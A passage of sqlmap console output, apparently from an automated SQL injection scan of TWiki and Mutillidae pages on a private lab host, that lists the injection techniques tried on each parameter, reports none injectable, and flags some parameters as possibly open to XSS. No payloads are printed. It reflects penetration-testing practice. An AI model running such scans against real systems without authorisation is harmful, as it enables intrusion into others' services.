[20:14:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:14:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:14:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:14:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:14:50] [INFO] testing 'Oracle AND time-based blind'
[20:14:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:14:51] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:14:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:15:00] [WARNING] GET parameter 'template' is not injectable
[20:15:00] [INFO] testing if GET parameter 'param1' is dynamic
[20:15:00] [WARNING] GET parameter 'param1' does not appear dynamic
[20:15:00] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[20:15:00] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[20:15:00] [INFO] testing for SQL injection on GET parameter 'param1'
[20:15:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:15:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:15:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:15:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:15:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:15:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:15:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:15:05] [INFO] testing 'MySQL inline queries'
[20:15:05] [INFO] testing 'PostgreSQL inline queries'
[20:15:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:15:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:15:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:15:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:15:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:15:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:15:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:15:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:15:09] [INFO] testing 'Oracle AND time-based blind'
[20:15:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:15:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:15:24] [WARNING] GET parameter 'param1' is not injectable
[20:15:24] [INFO] testing if GET parameter 'param2' is dynamic
[20:15:24] [WARNING] GET parameter 'param2' does not appear dynamic
[20:15:24] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[20:15:25] [INFO] testing for SQL injection on GET parameter 'param2'
[20:15:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:15:26] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:15:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:15:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:15:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:15:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:15:29] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:15:29] [INFO] testing 'MySQL inline queries'
[20:15:29] [INFO] testing 'PostgreSQL inline queries'
[20:15:29] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:15:29] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:15:30] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:15:30] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:15:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:15:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:15:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:15:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:15:33] [INFO] testing 'Oracle AND time-based blind'
[20:15:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:15:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:15:49] [WARNING] GET parameter 'param2' is not injectable
[20:15:49] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 180:
GET http://192.168.1.113:80/twiki/bin/edit/Main/TWikiGuest?t=1441457786
do you want to test this URL? [Y/n/q]
> Y
[20:15:49] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/TWikiGuest?t=1441457786'
[20:15:49] [INFO] testing connection to the target URL
[20:15:49] [INFO] testing if the target URL is stable
[20:15:50] [INFO] target URL is stable
[20:15:50] [INFO] testing if GET parameter 't' is dynamic
[20:15:50] [WARNING] GET parameter 't' does not appear dynamic
[20:15:50] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[20:15:50] [INFO] testing for SQL injection on GET parameter 't'
[20:15:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:15:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:15:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:15:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:15:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:15:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:15:53] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:15:53] [INFO] testing 'MySQL inline queries'
[20:15:54] [INFO] testing 'PostgreSQL inline queries'
[20:15:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:15:54] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:15:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:15:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:15:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:15:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:15:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:15:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:15:57] [INFO] testing 'Oracle AND time-based blind'
[20:15:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:15:57] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:16:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:16:08] [WARNING] GET parameter 't' is not injectable
[20:16:08] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 181:
GET http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&regex=on&search=TWiki *Guest[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[20:16:08] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&regex=on&search=TWiki *Guest[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[20:16:08] [INFO] testing connection to the target URL
[20:16:09] [INFO] testing if the target URL is stable
[20:16:10] [INFO] target URL is stable
[20:16:10] [INFO] testing if URI parameter '#1*' is dynamic
[20:16:10] [WARNING] URI parameter '#1*' does not appear dynamic
[20:16:10] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[20:16:10] [INFO] testing for SQL injection on URI parameter '#1*'
[20:16:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:16:10] [WARNING] reflective value(s) found and filtering out
[20:16:11] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:16:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:16:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:16:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:16:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:16:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:16:13] [INFO] testing 'MySQL inline queries'
[20:16:13] [INFO] testing 'PostgreSQL inline queries'
[20:16:14] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:16:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:16:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:16:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:16:15] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:16:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:16:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:16:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:16:17] [INFO] testing 'Oracle AND time-based blind'
[20:16:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:16:17] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:16:23] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:16:29] [WARNING] URI parameter '#1*' is not injectable
[20:16:29] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 182:
GET http://192.168.1.113:80/twiki/bin/view/Main/TWikiGuest?skin=print
do you want to test this URL? [Y/n/q]
> Y
[20:16:29] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiGuest?skin=print'
[20:16:29] [INFO] testing connection to the target URL
[20:16:29] [INFO] testing if the target URL is stable
[20:16:30] [INFO] target URL is stable
[20:16:30] [INFO] testing if GET parameter 'skin' is dynamic
[20:16:30] [INFO] confirming that GET parameter 'skin' is dynamic
[20:16:30] [INFO] GET parameter 'skin' is dynamic
[20:16:30] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[20:16:31] [INFO] testing for SQL injection on GET parameter 'skin'
[20:16:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:16:31] [INFO] heuristics detected web page charset 'ascii'
[20:16:31] [WARNING] reflective value(s) found and filtering out
[20:16:32] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:16:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:16:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:16:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:16:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:16:34] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:16:34] [INFO] testing 'MySQL inline queries'
[20:16:34] [INFO] testing 'PostgreSQL inline queries'
[20:16:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:16:34] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:16:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:16:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:16:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:16:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:16:36] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:16:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:16:37] [INFO] testing 'Oracle AND time-based blind'
[20:16:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:16:38] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:16:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:16:48] [WARNING] GET parameter 'skin' is not injectable
[20:16:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 183:
GET http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiGuest?rev1=1.6&rev2=1.5
do you want to test this URL? [Y/n/q]
> Y
[20:16:48] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiGuest?rev1=1.6&rev2=1.5'
[20:16:48] [INFO] testing connection to the target URL
[20:16:48] [INFO] testing if the target URL is stable
[20:16:49] [INFO] target URL is stable
[20:16:49] [INFO] testing if GET parameter 'rev1' is dynamic
[20:16:49] [WARNING] GET parameter 'rev1' does not appear dynamic
[20:16:49] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[20:16:49] [INFO] testing for SQL injection on GET parameter 'rev1'
[20:16:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:16:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:16:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:16:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:16:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:16:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:16:53] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:16:53] [INFO] testing 'MySQL inline queries'
[20:16:53] [INFO] testing 'PostgreSQL inline queries'
[20:16:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:16:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:16:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:16:54] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:16:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:16:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:16:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:16:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:16:56] [INFO] testing 'Oracle AND time-based blind'
[20:16:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:16:57] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:17:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:17:09] [WARNING] GET parameter 'rev1' is not injectable
[20:17:09] [INFO] testing if GET parameter 'rev2' is dynamic
[20:17:09] [WARNING] GET parameter 'rev2' does not appear dynamic
[20:17:09] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[20:17:09] [INFO] testing for SQL injection on GET parameter 'rev2'
[20:17:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:17:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:17:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:17:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:17:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:17:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:17:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:17:13] [INFO] testing 'MySQL inline queries'
[20:17:13] [INFO] testing 'PostgreSQL inline queries'
[20:17:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:17:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:17:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:17:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:17:14] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:17:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:17:15] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:17:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:17:16] [INFO] testing 'Oracle AND time-based blind'
[20:17:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:17:23] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:17:29] [WARNING] GET parameter 'rev2' is not injectable
[20:17:29] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 184:
GET http://192.168.1.113:80/twiki/bin/view/Main/TWikiGuest?rev=1.5
do you want to test this URL? [Y/n/q]
> Y
[20:17:29] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiGuest?rev=1.5'
[20:17:29] [INFO] testing connection to the target URL
[20:17:29] [INFO] testing if the target URL is stable
[20:17:30] [INFO] target URL is stable
[20:17:30] [INFO] testing if GET parameter 'rev' is dynamic
[20:17:30] [INFO] confirming that GET parameter 'rev' is dynamic
[20:17:30] [INFO] GET parameter 'rev' is dynamic
[20:17:30] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[20:17:30] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[20:17:30] [INFO] testing for SQL injection on GET parameter 'rev'
[20:17:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:17:30] [WARNING] reflective value(s) found and filtering out
[20:17:32] [INFO] GET parameter 'rev' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[20:17:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:17:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:17:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:17:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:17:32] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:17:32] [INFO] testing 'MySQL inline queries'
[20:17:32] [INFO] testing 'PostgreSQL inline queries'
[20:17:32] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:17:32] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:17:32] [WARNING] time-based comparison requires larger statistical model, please wait....
[20:17:33] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:17:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:17:33] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:17:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:17:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:17:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:17:33] [INFO] testing 'Oracle AND time-based blind'
[20:17:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:17:33] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:17:33] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:17:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[20:17:37] [INFO] checking if the injection point on GET parameter 'rev' is a false positive
[20:17:38] [WARNING] false positive or unexploitable injection point detected
[20:17:38] [WARNING] GET parameter 'rev' is not injectable
[20:17:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[20:17:38] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiGuest?rev1=1.5&rev2=1.4'
[20:17:38] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiGuest?rev=1.4'
URL 185:
GET http://192.168.1.113:80/twiki/bin/oops/Main/TWikiGuest?template=oopsmore&param1=1.6&param2=1.6
do you want to test this URL? [Y/n/q]
> Y
[20:17:38] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Main/TWikiGuest?template=oopsmore&param1=1.6&param2=1.6'
[20:17:38] [INFO] testing connection to the target URL
[20:17:38] [INFO] testing if the target URL is stable
[20:17:39] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[20:17:39] [INFO] testing if GET parameter 'template' is dynamic
[20:17:39] [INFO] confirming that GET parameter 'template' is dynamic
[20:17:39] [INFO] GET parameter 'template' is dynamic
[20:17:39] [INFO] heuristics detected web page charset 'ascii'
[20:17:39] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[20:17:39] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[20:17:39] [INFO] testing for SQL injection on GET parameter 'template'
[20:17:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:17:39] [WARNING] reflective value(s) found and filtering out
[20:17:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:17:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:17:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:17:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:17:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:17:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:17:42] [INFO] testing 'MySQL inline queries'
[20:17:42] [INFO] testing 'PostgreSQL inline queries'
[20:17:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:17:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:17:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:17:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:17:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:17:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:17:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:17:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:17:45] [INFO] testing 'Oracle AND time-based blind'
[20:17:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:17:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:17:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:17:54] [WARNING] GET parameter 'template' is not injectable
[20:17:54] [INFO] testing if GET parameter 'param1' is dynamic
[20:17:54] [WARNING] GET parameter 'param1' does not appear dynamic
[20:17:54] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[20:17:55] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[20:17:55] [INFO] testing for SQL injection on GET parameter 'param1'
[20:17:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:17:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:17:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:17:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:17:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:17:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:17:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:17:58] [INFO] testing 'MySQL inline queries'
[20:17:58] [INFO] testing 'PostgreSQL inline queries'
[20:17:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:17:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:17:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:17:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:18:00] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:18:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:18:01] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:18:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:18:02] [INFO] testing 'Oracle AND time-based blind'
[20:18:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:18:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:18:15] [WARNING] GET parameter 'param1' is not injectable
[20:18:15] [INFO] testing if GET parameter 'param2' is dynamic
[20:18:15] [WARNING] GET parameter 'param2' does not appear dynamic
[20:18:15] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[20:18:15] [INFO] testing for SQL injection on GET parameter 'param2'
[20:18:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:18:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:18:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:18:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:18:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:18:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:18:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:18:19] [INFO] testing 'MySQL inline queries'
[20:18:19] [INFO] testing 'PostgreSQL inline queries'
[20:18:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:18:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:18:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:18:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:18:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:18:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:18:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:18:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:18:22] [INFO] testing 'Oracle AND time-based blind'
[20:18:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:18:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:18:35] [WARNING] GET parameter 'param2' is not injectable
[20:18:35] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[20:18:35] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=documentation/vulnerabilities.php'
URL 186:
GET http://192.168.1.113:80/twiki/bin/edit/Main/EngineeringGroup?topicparent=Main.TWikiGroups
do you want to test this URL? [Y/n/q]
> Y
[20:18:35] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/EngineeringGroup?topicparent=Main.TWikiGroups'
